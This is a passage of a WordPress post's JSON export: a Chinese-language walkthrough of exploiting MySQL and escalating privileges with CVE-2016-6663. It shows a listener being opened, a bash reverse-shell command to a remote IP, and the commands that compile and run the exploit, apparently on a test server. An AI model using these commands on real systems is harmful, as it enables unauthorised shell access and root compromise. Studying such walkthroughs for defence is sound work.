>MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit<\/a><\/p>\n<p>\u901a\u8fc7\u8681\u5251\u4e0a\u4f20 EXP\uff0c\u7136\u540e Bash \u53cd\u5f39 shell\uff1a<\/p>\n<p>\u9996\u5148 10.20.24.244 \u7aef\u53e3\u5f00\u542f\u76d1\u542c\uff1a<\/p>\n<pre><code>\u279c  ~ ncat -lvp 2333\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\nNcat: Listening on :::2333\nNcat: Listening on 0.0.0.0:2333<\/code><\/pre>\n<p>\u8681\u5251\u7ec8\u7aef\u4e0b\u53cd\u5f39 Bash\uff1a<\/p>\n<pre><code>bash -i &gt;&amp; \/dev\/tcp\/10.20.24.244\/2333 0&gt;&amp;1<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057848805997.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057848805997.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u5728\u53cd\u5f39 shell \u7684\u60c5\u51b5\u4e0b\uff0c\u9996\u5148\u7f16\u8bd1 EXP\uff1a<\/p>\n<pre><code>gcc mysql-privesc-race.c -o mysql-privesc-race -I\/usr\/include\/mysql -lmysqlclient<\/code><\/pre>\n<p>\u6267\u884c EXP \u63d0\u6743\uff1a<\/p>\n<pre><code># .\/mysql-privesc-race \u6570\u636e\u5e93\u7528\u6237\u540d \u5bc6\u7801 \u6570\u636e\u5e93\u5730\u5740 \u6570\u636e\u5e93\n.\/mysql-privesc-race test 123456 localhost test<\/code><\/pre>\n<p>Bingo! \u6210\u529f\uff0c\u6700\u540e\u7684\u63d0\u6743\u6210\u529f\u7684\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057855918281.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057855918281.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8981\u60f3\u83b7\u53d6 root \u6743\u9650\u5f97\u914d\u5408 CVE-2016-6662 \u4e0e CVE-2016-6664 \u8fd9\u4e24\u4e2a\u6f0f\u6d1e\uff0c\u4f46\u662f\u56fd\u5149 CVE-2016-6664 \u6f0f\u6d1e\u590d\u73b0\u5931\u8d25\u4e86\u2026 \u6316\u4e2a\u5751\uff0c\u540e\u7eed\u6709\u673a\u4f1a\u518d\u6765\u603b\u7ed3\uff0c\u6e9c\u4e86\u6e9c\u4e86\uff5e\uff5e<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743 \u6743\u9650\u83b7\u53d6 \u6570\u636e\u5e93\u64cd\u4f5c\u6743\u9650 \u63d0\u6743\u4e4b\u524d\u5f97\u5148\u62ff\u5230\u9ad8\u6743\u9650\u7684 MySQL \u7528\u6237\u624d\u53ef\u4ee5\uff0c\u62ff\u5230 MySQL \u7684\u7528\u6237\u540d\u548c &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-353","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=353"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions"}],"predecessor-version":[{"id":354,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions\/354"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=353"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}